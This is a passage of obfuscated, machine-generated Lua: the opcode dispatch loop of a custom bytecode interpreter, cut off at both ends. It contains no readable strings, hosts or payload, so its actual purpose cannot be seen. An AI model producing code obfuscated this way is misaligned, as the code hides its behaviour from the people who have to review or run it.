h=h+1;t[h]=l[e];end;l[i](c(t,1,a-i));o=i-1;n=n+1;e=d[n];i=e[2];local s=l[e[3]];l[i+1]=s;l[i]=s[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];t={};h=0;a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;local f={l[i](c(t,1,a-i))};local t,f=f,#f;f=i+e[4]-2;h=0;for e=i,f do h=h+1;l[e]=t[h];end;o=f;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=2 then local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][l[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];elseif i>3 then n=n+e[3];else local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];end;elseif i<=7 then if i<=5 then local e=e[2];l[e]();o=e-1;elseif i>6 then local n=e[2];if n>o then o=n end;l[n]=(e[3]~=0);else local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][l[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];end;elseif i<=8 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>9 then local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else do return end;end;elseif i<=15 then if i<=12 then if i>11 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=13 then l[e[2]][f[e[3]]]=l[e[4]];elseif i>14 then local n=e[2];if n>o then o=n end;l[n]=f[e[3]];else local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local s={l[i](c(t,1,s-i))};local r,s=s,#s;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=r[a];end;o=s;n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;l[i](c(t,1,s-i));o=i-1;end;elseif i<=18 then if i<=16 then local o=e[2];local f=e[4];local e=o+2;local d={l[o](l[o+1],l[e])};for n=1,f do l[e+n]=d[n];end;local o=l[o+3];if o then l[e]=o else n=n+1;end;elseif i>17 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];h()[f[e[3]]]=l[e[2]];else local e=e[2];l[e]();o=e-1;end;elseif i<=19 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];h()[f[e[3]]]=l[e[2]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];elseif i>20 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];else local n;local d=e[2];local f={};local n=0;local t=d+e[3]-1;for e=d+1,t do n=n+1;f[n]=l[e];end;local f={l[d](c(f,1,t-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=32 then if i<=26 then if i<=23 then if i>22 then local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;else local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=24 then local f=Q[e[3]];local t;if f[5]~=0 then local e={};t=Z({},{__index=function(l,n)local e=e[n];return e[1][e[2]];end,__newindex=function(o,n,l)local e=e[n]e[1][e[2]]=l;end;});for o=1,f[5]do n=n+1;local n=d[n];if n[1]==204 then e[o-1]={l,n[3]};else e[o-1]={K,n[3]};end;r[#r+1]=e;end;end;local e=e[2];if e>o then o=e end;l[e]=A(f,t,Env);elseif i>25 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];else local e=e[2];l[e]();o=e-1;end;elseif i<=29 then if i<=27 then local n;local d=e[2];local f={};local n=0;local t=d+e[3]-1;for e=d+1,t do n=n+1;f[n]=l[e];end;local f={l[d](c(f,1,t-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;elseif i>28 then local n=e[2];if n>o then o=n end;l[n]=f[e[3]];else local n;local d=e[2];local f={};local n=0;local t=o;for e=d+1,t do n=n+1;f[n]=l[e];end;local f={l[d](c(f,1,t-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=30 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][l[e[4]]];elseif i>31 then l[e[2]][f[e[3]]]=l[e[4]];else local i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;local t={l[i](c(t,1,a-i))};local c,t=t,#t;t=i+e[4]-2;h=0;for e=i,t do h=h+1;l[e]=c[h];end;o=t;n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];end;elseif i<=38 then if i<=35 then if i<=33 then local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local r={l[i](c(t,1,s-i))};local A,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][l[e[4]]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};A,s=r,#r;s=s+i-1;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];t={};a=0;s=o;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};A,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;elseif i>34 then n=n+e[3];else if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=36 then local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>37 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];else local n;local d=e[2];local f={};local n=0;local e=d+e[3]-1;for e=d+1,e do n=n+1;f[n]=l[e];end;local e={l[d](c(f,1,e-d))};local f,e=e,#e;e=e+d-1;n=0;for e=d,e do n=n+1;l[e]=f[n];end;o=e;end;elseif i<=41 then if i<=39 then local t;local t=e[2];local r={};local i=0;local a=t+e[3]-1;for e=t+1,a do i=i+1;r[i]=l[e];end;local s={l[t](c(r,1,a-t))};local A,a=s,#s;a=t+e[4]-2;i=0;for e=t,a do i=i+1;l[e]=A[i];end;o=a;n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=f[e[3]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=f[e[3]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=f[e[3]];n=n+1;e=d[n];t=e[2];r={};i=0;a=t+e[3]-1;for e=t+1,a do i=i+1;r[i]=l[e];end;s={l[t](c(r,1,a-t))};A,a=s,#s;a=t+e[4]-2;i=0;for e=t,a do i=i+1;l[e]=A[i];end;o=a;n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]]*l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];elseif i>40 then h()[f[e[3]]]=l[e[2]];else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=42 then local n;local n=e[2];local f={};local d=0;local e=n+e[3]-1;for e=n+1,e do d=d+1;f[d]=l[e];end;l[n](c(f,1,e-n));o=n-1;elseif i>43 then local n=e[2];if n>o then o=n end;l[n]=#l[e[3]];else do return end;end;elseif i<=67 then if i<=55 then if i<=49 then if i<=46 then if i>45 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];else local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][l[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];end;elseif i<=47 then if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>48 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];else local t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];end;elseif i<=52 then if i<=50 then local n;local d=e[2];local f={};local n=0;local e=d+e[3]-1;for e=d+1,e do n=n+1;f[n]=l[e];end;local e={l[d](c(f,1,e-d))};local f,e=e,#e;e=e+d-1;n=0;for e=d,e do n=n+1;l[e]=f[n];end;o=e;elseif i>51 then local i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;local t={l[i](c(t,1,a-i))};local c,t=t,#t;t=i+e[4]-2;h=0;for e=i,t do h=h+1;l[e]=c[h];end;o=t;n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];else local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];end;elseif i<=53 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>54 then local i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;l[i](c(t,1,s-i));o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local h={l[i](c(t,1,s-i))};local s,f=h,#h;f=f+i-1;a=0;for e=i,f do a=a+1;l[e]=s[a];end;o=f;n=n+1;e=d[n];i=e[2];t={};a=0;f=o;for e=i+1,f do a=a+1;t[a]=l[e];end;h={l[i](c(t,1,f-i))};s,f=h,#h;f=i+e[4]-2;a=0;for e=i,f do a=a+1;l[e]=s[a];end;o=f;else local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=61 then if i<=58 then if i<=56 then local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;elseif i>57 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][l[e[4]]];else local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;end;elseif i<=59 then if not l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>60 then local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];end;elseif i<=64 then if i<=62 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>63 then local o=e[2];local d=e[4];local e=o+2;local f={l[o](l[o+1],l[e])};for n=1,d do l[e+n]=f[n];end;local o=l[o+3];if o then l[e]=o else n=n+1;end;else local t;local t=e[2];local a={};local i=0;local s=t+e[3]-1;for e=t+1,s do i=i+1;a[i]=l[e];end;l[t](c(a,1,s-t));o=t-1;n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];local r=l[e[3]];l[t+1]=r;l[t]=r[f[e[4]]];if t+1>o then o=t+1 end;n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=f[e[3]];n=n+1;e=d[n];t=e[2];a={};i=0;s=t+e[3]-1;for e=t+1,s do i=i+1;a[i]=l[e];end;local s={l[t](c(a,1,s-t))};local A,h=s,#s;h=t+e[4]-2;i=0;for e=t,h do i=i+1;l[e]=A[i];end;o=h;n=n+1;e=d[n];t=e[2];r=l[e[3]];l[t+1]=r;l[t]=r[f[e[4]]];if t+1>o then o=t+1 end;n=n+1;e=d[n];t=e[2];a={};i=0;h=t+e[3]-1;for e=t+1,h do i=i+1;a[i]=l[e];end;s={l[t](c(a,1,h-t))};A,h=s,#s;h=t+e[4]-2;i=0;for e=t,h do i=i+1;l[e]=A[i];end;o=h;end;elseif i<=65 then local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>66 then local n=e[2];if n>o then o=n end;l[n]={c({},1,e[3])};else local n;local d=e[2];local f={};local n=0;local t=d+e[3]-1;for e=d+1,t do n=n+1;f[n]=l[e];end;local f={l[d](c(f,1,t-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=78 then if i<=72 then if i<=69 then if i>68 then if(l[e[3]]~=l[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;else if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=70 then local o=e[2];l[o]=l[o]-l[o+2];n=n+e[3];elseif i>71 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];end;elseif i<=75 then if i<=73 then local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>74 then local n=e[2];local d=n+e[3]-2;local o={};local e=0;for n=n,d do e=e+1;o[e]=l[n];end;do return c(o,1,e)end;else local n=e[2];if n>o then o=n end;l[n]=f[e[3]];end;elseif i<=76 then local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local r={l[i](c(t,1,s-i))};local A,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i 